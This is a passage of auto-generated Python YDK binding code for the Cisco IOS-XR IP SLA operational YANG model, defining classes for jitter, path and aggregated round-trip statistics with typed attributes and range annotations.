Minimum of one\-way jitter values in DS direction (msec)
**type**\: int
**range:** 0..4294967295
.. attribute:: one_way_ds_max
Maximum of one\-way jitter values in DS direction (msec)
**type**\: int
**range:** 0..4294967295
.. attribute:: one_way_ds_sum
Sum of one\-way jitter values in DS direction (msec)
**type**\: int
**range:** 0..4294967295
.. attribute:: one_way_ds_sum2
Sum of squares of the OneWayMinDS and OneWayMaxDS values (msec)
**type**\: int
**range:** 0..18446744073709551615
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Statistics.Latest.Hops.Hop.SpecificStats.UdpJitterStats, self).__init__()
self.yang_name = "udp-jitter-stats"
self.yang_parent_name = "specific-stats"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('jitter_in', YLeaf(YType.uint32, 'jitter-in')),
('jitter_out', YLeaf(YType.uint32, 'jitter-out')),
('packet_loss_sd', YLeaf(YType.uint32, 'packet-loss-sd')),
('packet_loss_ds', YLeaf(YType.uint32, 'packet-loss-ds')),
('packet_out_of_sequence', YLeaf(YType.uint32, 'packet-out-of-sequence')),
('packet_mia', YLeaf(YType.uint32, 'packet-mia')),
('packet_skipped', YLeaf(YType.uint32, 'packet-skipped')),
('packet_late_arrivals', YLeaf(YType.uint32, 'packet-late-arrivals')),
('packet_invalid_tstamp', YLeaf(YType.uint32, 'packet-invalid-tstamp')),
('internal_errors_count', YLeaf(YType.uint32, 'internal-errors-count')),
('busies_count', YLeaf(YType.uint32, 'busies-count')),
('positive_sd_sum', YLeaf(YType.uint32, 'positive-sd-sum')),
('positive_sd_sum2', YLeaf(YType.uint64, 'positive-sd-sum2')),
('positive_sd_min', YLeaf(YType.uint32, 'positive-sd-min')),
('positive_sd_max', YLeaf(YType.uint32, 'positive-sd-max')),
('positive_sd_count', YLeaf(YType.uint32, 'positive-sd-count')),
('negative_sd_sum', YLeaf(YType.uint32, 'negative-sd-sum')),
('negative_sd_sum2', YLeaf(YType.uint64, 'negative-sd-sum2')),
('negative_sd_min', YLeaf(YType.uint32, 'negative-sd-min')),
('negative_sd_max', YLeaf(YType.uint32, 'negative-sd-max')),
('negative_sd_count', YLeaf(YType.uint32, 'negative-sd-count')),
('positive_ds_sum', YLeaf(YType.uint32, 'positive-ds-sum')),
('positive_ds_sum2', YLeaf(YType.uint64, 'positive-ds-sum2')),
('positive_ds_min', YLeaf(YType.uint32, 'positive-ds-min')),
('positive_ds_max', YLeaf(YType.uint32, 'positive-ds-max')),
('positive_ds_count', YLeaf(YType.uint32, 'positive-ds-count')),
('negative_ds_sum', YLeaf(YType.uint32, 'negative-ds-sum')),
('negative_ds_sum2', YLeaf(YType.uint64, 'negative-ds-sum2')),
('negative_ds_min', YLeaf(YType.uint32, 'negative-ds-min')),
('negative_ds_max', YLeaf(YType.uint32, 'negative-ds-max')),
('negative_ds_count', YLeaf(YType.uint32, 'negative-ds-count')),
('one_way_count', YLeaf(YType.uint32, 'one-way-count')),
('one_way_sd_min', YLeaf(YType.uint32, 'one-way-sd-min')),
('one_way_sd_max', YLeaf(YType.uint32, 'one-way-sd-max')),
('one_way_sd_sum', YLeaf(YType.uint32, 'one-way-sd-sum')),
('one_way_sd_sum2', YLeaf(YType.uint64, 'one-way-sd-sum2')),
('one_way_ds_min', YLeaf(YType.uint32, 'one-way-ds-min')),
('one_way_ds_max', YLeaf(YType.uint32, 'one-way-ds-max')),
('one_way_ds_sum', YLeaf(YType.uint32, 'one-way-ds-sum')),
('one_way_ds_sum2', YLeaf(YType.uint64, 'one-way-ds-sum2')),
])
self.jitter_in = None
self.jitter_out = None
self.packet_loss_sd = None
self.packet_loss_ds = None
self.packet_out_of_sequence = None
self.packet_mia = None
self.packet_skipped = None
self.packet_late_arrivals = None
self.packet_invalid_tstamp = None
self.internal_errors_count = None
self.busies_count = None
self.positive_sd_sum = None
self.positive_sd_sum2 = None
self.positive_sd_min = None
self.positive_sd_max = None
self.positive_sd_count = None
self.negative_sd_sum = None
self.negative_sd_sum2 = None
self.negative_sd_min = None
self.negative_sd_max = None
self.negative_sd_count = None
self.positive_ds_sum = None
self.positive_ds_sum2 = None
self.positive_ds_min = None
self.positive_ds_max = None
self.positive_ds_count = None
self.negative_ds_sum = None
self.negative_ds_sum2 = None
self.negative_ds_min = None
self.negative_ds_max = None
self.negative_ds_count = None
self.one_way_count = None
self.one_way_sd_min = None
self.one_way_sd_max = None
self.one_way_sd_sum = None
self.one_way_sd_sum2 = None
self.one_way_ds_min = None
self.one_way_ds_max = None
self.one_way_ds_sum = None
self.one_way_ds_sum2 = None
self._segment_path = lambda: "udp-jitter-stats"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.Statistics.Latest.Hops.Hop.SpecificStats.UdpJitterStats, ['jitter_in', 'jitter_out', 'packet_loss_sd', 'packet_loss_ds', 'packet_out_of_sequence', 'packet_mia', 'packet_skipped', 'packet_late_arrivals', 'packet_invalid_tstamp', 'internal_errors_count', 'busies_count', 'positive_sd_sum', 'positive_sd_sum2', 'positive_sd_min', 'positive_sd_max', 'positive_sd_count', 'negative_sd_sum', 'negative_sd_sum2', 'negative_sd_min', 'negative_sd_max', 'negative_sd_count', 'positive_ds_sum', 'positive_ds_sum2', 'positive_ds_min', 'positive_ds_max', 'positive_ds_count', 'negative_ds_sum', 'negative_ds_sum2', 'negative_ds_min', 'negative_ds_max', 'negative_ds_count', 'one_way_count', 'one_way_sd_min', 'one_way_sd_max', 'one_way_sd_sum', 'one_way_sd_sum2', 'one_way_ds_min', 'one_way_ds_max', 'one_way_ds_sum', 'one_way_ds_sum2'], name, value)
class LpdPaths(Entity):
"""
List of latest LPD paths
.. attribute:: lpd_path
Latest path statistics of MPLS LSP group operation
**type**\: list of :py:class:`LpdPath <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Latest.LpdPaths.LpdPath>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Statistics.Latest.LpdPaths, self).__init__()
self.yang_name = "lpd-paths"
self.yang_parent_name = "latest"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([("lpd-path", ("lpd_path", Ipsla.OperationData.Operations.Operation.Statistics.Latest.LpdPaths.LpdPath))])
self._leafs = OrderedDict()
self.lpd_path = YList(self)
self._segment_path = lambda: "lpd-paths"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.Statistics.Latest.LpdPaths, [], name, value)
class LpdPath(Entity):
"""
Latest path statistics of MPLS LSP group
operation
.. attribute:: path_index (key)
LPD path index
**type**\: int
**range:** \-2147483648..2147483647
.. attribute:: path_id
LPD path identifier
**type**\: :py:class:`PathId <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Latest.LpdPaths.LpdPath.PathId>`
.. attribute:: return_code
Path return code
**type**\: :py:class:`IpslaRetCode <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.IpslaRetCode>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Statistics.Latest.LpdPaths.LpdPath, self).__init__()
self.yang_name = "lpd-path"
self.yang_parent_name = "lpd-paths"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['path_index']
self._child_container_classes = OrderedDict([("path-id", ("path_id", Ipsla.OperationData.Operations.Operation.Statistics.Latest.LpdPaths.LpdPath.PathId))])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('path_index', YLeaf(YType.int32, 'path-index')),
('return_code', YLeaf(YType.enumeration, 'return-code')),
])
self.path_index = None
self.return_code = None
self.path_id = Ipsla.OperationData.Operations.Operation.Statistics.Latest.LpdPaths.LpdPath.PathId()
self.path_id.parent = self
self._children_name_map["path_id"] = "path-id"
self._children_yang_names.add("path-id")
self._segment_path = lambda: "lpd-path" + "[path-index='" + str(self.path_index) + "']"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.Statistics.Latest.LpdPaths.LpdPath, ['path_index', 'return_code'], name, value)
class PathId(Entity):
"""
LPD path identifier
.. attribute:: lsp_selector
LSP selector
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
.. attribute:: output_interface
Output interface
**type**\: str
**pattern:** [a\-zA\-Z0\-9./\-]+
.. attribute:: nexthop_address
Nexthop address
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
.. attribute:: downstream_label
Downstream label stacks
**type**\: list of int
**range:** 0..4294967295
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Statistics.Latest.LpdPaths.LpdPath.PathId, self).__init__()
self.yang_name = "path-id"
self.yang_parent_name = "lpd-path"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('lsp_selector', YLeaf(YType.str, 'lsp-selector')),
('output_interface', YLeaf(YType.str, 'output-interface')),
('nexthop_address', YLeaf(YType.str, 'nexthop-address')),
('downstream_label', YLeafList(YType.uint32, 'downstream-label')),
])
self.lsp_selector = None
self.output_interface = None
self.nexthop_address = None
self.downstream_label = []
self._segment_path = lambda: "path-id"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.Statistics.Latest.LpdPaths.LpdPath.PathId, ['lsp_selector', 'output_interface', 'nexthop_address', 'downstream_label'], name, value)
class Aggregated(Entity):
"""
Statistics aggregated for data collected
over time intervals
.. attribute:: enhanced_intervals
Table of statistics aggregated over enhanced intervals
**type**\: :py:class:`EnhancedIntervals <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.EnhancedIntervals>`
.. attribute:: hours
Table of statistics aggregated over 1\-hour intervals
**type**\: :py:class:`Hours <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated, self).__init__()
self.yang_name = "aggregated"
self.yang_parent_name = "statistics"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([("enhanced-intervals", ("enhanced_intervals", Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.EnhancedIntervals)), ("hours", ("hours", Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours))])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict()
self.enhanced_intervals = Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.EnhancedIntervals()
self.enhanced_intervals.parent = self
self._children_name_map["enhanced_intervals"] = "enhanced-intervals"
self._children_yang_names.add("enhanced-intervals")
self.hours = Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.Hours()
self.hours.parent = self
self._children_name_map["hours"] = "hours"
self._children_yang_names.add("hours")
self._segment_path = lambda: "aggregated"
class EnhancedIntervals(Entity):
"""
Table of statistics aggregated over
enhanced intervals
.. attribute:: enhanced_interval
Statistics aggregated over an interval specified in seconds. Specified interval must be a multiple of the operation frequency
**type**\: list of :py:class:`EnhancedInterval <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.EnhancedIntervals.EnhancedInterval>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.EnhancedIntervals, self).__init__()
self.yang_name = "enhanced-intervals"
self.yang_parent_name = "aggregated"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([("enhanced-interval", ("enhanced_interval", Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.EnhancedIntervals.EnhancedInterval))])
self._leafs = OrderedDict()
self.enhanced_interval = YList(self)
self._segment_path = lambda: "enhanced-intervals"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.EnhancedIntervals, [], name, value)
class EnhancedInterval(Entity):
"""
Statistics aggregated over an interval
specified in seconds. Specified interval
must be a multiple of the operation
frequency
.. attribute:: enhanced_interval (key)
Enhanced Interval in seconds
**type**\: int
**range:** \-2147483648..2147483647
**units**\: second
.. attribute:: start_times
Table of start times for the intervals
**type**\: :py:class:`StartTimes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.EnhancedIntervals.EnhancedInterval.StartTimes>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.EnhancedIntervals.EnhancedInterval, self).__init__()
self.yang_name = "enhanced-interval"
self.yang_parent_name = "enhanced-intervals"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['enhanced_interval']
self._child_container_classes = OrderedDict([("start-times", ("start_times", Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.EnhancedIntervals.EnhancedInterval.StartTimes))])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('enhanced_interval', YLeaf(YType.int32, 'enhanced-interval')),
])
self.enhanced_interval = None
self.start_times = Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.EnhancedIntervals.EnhancedInterval.StartTimes()
self.start_times.parent = self
self._children_name_map["start_times"] = "start-times"
self._children_yang_names.add("start-times")
self._segment_path = lambda: "enhanced-interval" + "[enhanced-interval='" + str(self.enhanced_interval) + "']"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.EnhancedIntervals.EnhancedInterval, ['enhanced_interval'], name, value)
class StartTimes(Entity):
"""
Table of start times for the intervals
.. attribute:: start_time
Statistics aggregated over an enhanced interval which starts at a specific time
**type**\: list of :py:class:`StartTime <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.EnhancedIntervals.EnhancedInterval.StartTimes.StartTime>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.EnhancedIntervals.EnhancedInterval.StartTimes, self).__init__()
self.yang_name = "start-times"
self.yang_parent_name = "enhanced-interval"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([("start-time", ("start_time", Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.EnhancedIntervals.EnhancedInterval.StartTimes.StartTime))])
self._leafs = OrderedDict()
self.start_time = YList(self)
self._segment_path = lambda: "start-times"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.EnhancedIntervals.EnhancedInterval.StartTimes, [], name, value)
class StartTime(Entity):
"""
Statistics aggregated over an enhanced
interval which starts at a specific time
.. attribute:: interval_start_time (key)
Interval Start Time
**type**\: str
**pattern:** [\\w\\\-\\.\:,\_@#%$\\+=\\\|;]+
.. attribute:: common_stats
Common Stats
**type**\: :py:class:`CommonStats <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.EnhancedIntervals.EnhancedInterval.StartTimes.StartTime.CommonStats>`
.. attribute:: specific_stats
Operation Specific Stats
**type**\: :py:class:`SpecificStats <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.EnhancedIntervals.EnhancedInterval.StartTimes.StartTime.SpecificStats>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.EnhancedIntervals.EnhancedInterval.StartTimes.StartTime, self).__init__()
self.yang_name = "start-time"
self.yang_parent_name = "start-times"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['interval_start_time']
self._child_container_classes = OrderedDict([("common-stats", ("common_stats", Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.EnhancedIntervals.EnhancedInterval.StartTimes.StartTime.CommonStats)), ("specific-stats", ("specific_stats", Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.EnhancedIntervals.EnhancedInterval.StartTimes.StartTime.SpecificStats))])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('interval_start_time', YLeaf(YType.str, 'interval-start-time')),
])
self.interval_start_time = None
self.common_stats = Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.EnhancedIntervals.EnhancedInterval.StartTimes.StartTime.CommonStats()
self.common_stats.parent = self
self._children_name_map["common_stats"] = "common-stats"
self._children_yang_names.add("common-stats")
self.specific_stats = Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.EnhancedIntervals.EnhancedInterval.StartTimes.StartTime.SpecificStats()
self.specific_stats.parent = self
self._children_name_map["specific_stats"] = "specific-stats"
self._children_yang_names.add("specific-stats")
self._segment_path = lambda: "start-time" + "[interval-start-time='" + str(self.interval_start_time) + "']"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.EnhancedIntervals.EnhancedInterval.StartTimes.StartTime, ['interval_start_time'], name, value)
class CommonStats(Entity):
"""
Common Stats
.. attribute:: operation_time
Operation Time
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: return_code
Return code
**type**\: :py:class:`IpslaRetCode <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.IpslaRetCode>`
.. attribute:: response_time_count
Number of RTT samples used for the statistics
**type**\: int
**range:** 0..4294967295
.. attribute:: response_time
RTT
**type**\: int
**range:** 0..4294967295
.. attribute:: min_response_time
Minimum RTT
**type**\: int
**range:** 0..4294967295
.. attribute:: max_response_time
Maximum RTT
**type**\: int
**range:** 0..4294967295
.. attribute:: sum_response_time
Sum of RTT
**type**\: int
**range:** 0..4294967295
.. attribute:: sum2_response_time
Sum of RTT^2
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: update_count
Number of updates processed
**type**\: int
**range:** 0..4294967295
.. attribute:: ok_count
Number of updates with Okay return code
**type**\: int
**range:** 0..4294967295
.. attribute:: disconnect_count
Number of updates with Disconnected return code
**type**\: int
**range:** 0..4294967295
.. attribute:: timeout_count
Number of updates with Timeout return code
**type**\: int
**range:** 0..4294967295
.. attribute:: busy_count
Number of updates with Busy return code
**type**\: int
**range:** 0..4294967295
.. attribute:: no_connection_count
Number of updates with NotConnected return code
**type**\: int
**range:** 0..4294967295
.. attribute:: dropped_count
Number of updates with Dropped return code
**type**\: int
**range:** 0..4294967295
.. attribute:: internal_error_count
Number of updates with InternalError return code
**type**\: int
**range:** 0..4294967295
.. attribute:: sequence_error_count
Number of updates with SeqError return code
**type**\: int
**range:** 0..4294967295
.. attribute:: verify_error_count
Number of updates with VerifyError return code
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.EnhancedIntervals.EnhancedInterval.StartTimes.StartTime.CommonStats, self).__init__()
self.yang_name = "common-stats"
self.yang_parent_name = "start-time"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('operation_time', YLeaf(YType.uint64, 'operation-time')),
('return_code', YLeaf(YType.enumeration, 'return-code')),
('response_time_count', YLeaf(YType.uint32, 'response-time-count')),
('response_time', YLeaf(YType.uint32, 'response-time')),
('min_response_time', YLeaf(YType.uint32, 'min-response-time')),
('max_response_time', YLeaf(YType.uint32, 'max-response-time')),
('sum_response_time', YLeaf(YType.uint32, 'sum-response-time')),
('sum2_response_time', YLeaf(YType.uint64, 'sum2-response-time')),
('update_count', YLeaf(YType.uint32, 'update-count')),
('ok_count', YLeaf(YType.uint32, 'ok-count')),
('disconnect_count', YLeaf(YType.uint32, 'disconnect-count')),
('timeout_count', YLeaf(YType.uint32, 'timeout-count')),
('busy_count', YLeaf(YType.uint32, 'busy-count')),
('no_connection_count', YLeaf(YType.uint32, 'no-connection-count')),
('dropped_count', YLeaf(YType.uint32, 'dropped-count')),
('internal_error_count', YLeaf(YType.uint32, 'internal-error-count')),
('sequence_error_count', YLeaf(YType.uint32, 'sequence-error-count')),
('verify_error_count', YLeaf(YType.uint32, 'verify-error-count')),
])
self.operation_time = None
self.return_code = None
self.response_time_count = None
self.response_time = None
self.min_response_time = None
self.max_response_time = None
self.sum_response_time = None
self.sum2_response_time = None
self.update_count = None
self.ok_count = None
self.disconnect_count = None
self.timeout_count = None
self.busy_count = None
self.no_connection_count = None
self.dropped_count = None
self.internal_error_count = None
self.sequence_error_count = None
self.verify_error_count = None
self._segment_path = lambda: "common-stats"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.EnhancedIntervals.EnhancedInterval.StartTimes.StartTime.CommonStats, ['operation_time', 'return_code', 'response_time_count', 'response_time', 'min_response_time', 'max_response_time', 'sum_response_time', 'sum2_response_time', 'update_count', 'ok_count', 'disconnect_count', 'timeout_count', 'busy_count', 'no_connection_count', 'dropped_count', 'internal_error_count', 'sequence_error_count', 'verify_error_count'], name, value)
class SpecificStats(Entity):
"""
Operation Specific Stats
.. attribute:: icmp_path_jitter_stats
icmp path jitter stats
**type**\: :py:class:`IcmpPathJitterStats <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.EnhancedIntervals.EnhancedInterval.StartTimes.StartTime.SpecificStats.IcmpPathJitterStats>`
.. attribute:: udp_jitter_stats
udp jitter stats
**type**\: :py:class:`UdpJitterStats <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.EnhancedIntervals.EnhancedInterval.StartTimes.StartTime.SpecificStats.UdpJitterStats>`
.. attribute:: op_type
op type
**type**\: :py:class:`OpTypeEnum <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.OpTypeEnum>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.EnhancedIntervals.EnhancedInterval.StartTimes.StartTime.SpecificStats, self).__init__()
self.yang_name = "specific-stats"
self.yang_parent_name = "start-time"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([("icmp-path-jitter-stats", ("icmp_path_jitter_stats", Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.EnhancedIntervals.EnhancedInterval.StartTimes.StartTime.SpecificStats.IcmpPathJitterStats)), ("udp-jitter-stats", ("udp_jitter_stats", Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.EnhancedIntervals.EnhancedInterval.StartTimes.StartTime.SpecificStats.UdpJitterStats))])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('op_type', YLeaf(YType.enumeration, 'op-type')),
])
self.op_type = None
self.icmp_path_jitter_stats = Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.EnhancedIntervals.EnhancedInterval.StartTimes.StartTime.SpecificStats.IcmpPathJitterStats()
self.icmp_path_jitter_stats.parent = self
self._children_name_map["icmp_path_jitter_stats"] = "icmp-path-jitter-stats"
self._children_yang_names.add("icmp-path-jitter-stats")
self.udp_jitter_stats = Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.EnhancedIntervals.EnhancedInterval.StartTimes.StartTime.SpecificStats.UdpJitterStats()
self.udp_jitter_stats.parent = self
self._children_name_map["udp_jitter_stats"] = "udp-jitter-stats"
self._children_yang_names.add("udp-jitter-stats")
self._segment_path = lambda: "specific-stats"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.EnhancedIntervals.EnhancedInterval.StartTimes.StartTime.SpecificStats, ['op_type'], name, value)
class IcmpPathJitterStats(Entity):
"""
icmp path jitter stats
.. attribute:: source_address
IP Address of the source
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
.. attribute:: dest_address
IP Address of the destination
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
.. attribute:: hop_address
IP address of the hop in the path
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
.. attribute:: packet_interval
Interval between echos in ms
**type**\: int
**range:** 0..4294967295
.. attribute:: response_time_count
Number of RTT samples used for the statistics
**type**\: int
**range:** 0..4294967295
.. attribute:: response_time
RTT
**type**\: int
**range:** 0..4294967295
.. attribute:: min_response_time
Minimum RTT
**type**\: int
**range:** 0..4294967295
.. attribute:: max_response_time
Maximum RTT
**type**\: int
**range:** 0..4294967295
.. attribute:: sum_response_time
Sum of RTT
**type**\: int
**range:** 0..4294967295
.. attribute:: sum2_response_time
Sum of RTT^2
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: packet_count
Number of Echo replies received
**type**\: int
**range:** 0..4294967295
.. attribute:: packet_loss_count
Number of packets lost
**type**\: int
**range:** 0..4294967295
.. attribute:: out_of_sequence_count
Number of out of sequence packets
**type**\: int
**range:** 0..4294967295
.. attribute:: discarded_sample_count
Number of discarded samples
**type**\: int
**range:** 0..4294967295
.. attribute:: verify_errors_count
Number of packets with data corruption
**type**\: int
**range:** 0..4294967295
.. attribute:: dropped_error_count
Number of packets dropped
**type**\: int
**range:** 0..4294967295
.. attribute:: jitter
Jitter value for this node in the path
**type**\: int
**range:** 0..4294967295
.. attribute:: pos_jitter_sum
Sum of positive jitter value
**type**\: int
**range:** 0..4294967295
.. attribute:: pos_jitter_sum2
Sum of squares of positive jitter values
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: pos_jitter_min
Minimum positive jitter value
**type**\: int
**range:** 0..4294967295
.. attribute:: pos_jitter_max
Maximum positive jitter value
**type**\: int
**range:** 0..4294967295
.. attribute:: pos_jitter_count
Number of positive jitter values
**type**\: int
**range:** 0..4294967295
.. attribute:: neg_jitter_sum
Sum of negative jitter values
**type**\: int
**range:** 0..4294967295
.. attribute:: neg_jitter_min
Minimum negative jitter value
**type**\: int
**range:** 0..4294967295
.. attribute:: neg_jitter_max
Maximum negative jitter value
**type**\: int
**range:** 0..4294967295
.. attribute:: neg_jitter_sum2
Sum of squares of negative jitter values
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: neg_jitter_count
Number of negative jitter values
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Statistics.Aggregated.EnhancedIntervals.EnhancedInterval.StartTimes.StartTime.SpecificStats.IcmpPathJitterStats, self).__init__()
self.yang_name = "icmp-path-jitter-stats"
self.yang_parent_name = "specific-stats"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('source_address', YLeaf(YType.str, 'source-address')),
('dest_address', YLeaf(YType.str, 'dest-address')),
('hop_address', YLeaf(YType.str, 'hop-address')),
('packet_interval', YLeaf(YType.uint32, 'packet-interval')),
('response_time_count', YLeaf(YType.uint32, 'response-time-count')),
('response_time', YLeaf(YType.uint32, 'response-time')),
('min_response_time', YLeaf(YType.uint32, 'min-response-time')),
('max_response_time', YLeaf(YType.uint32, 'max-response-time')),
('sum_response_time', YLeaf(YType.uint32, 'sum-response-time')),
('sum2_response_time', YLeaf(YType.uint64, 'sum2-response-time')),
('packet_count', YLeaf(YType.uint32, 'packet-count')),
('packet_loss_count', YLeaf(YType.uint32, 'packet-loss-count')),
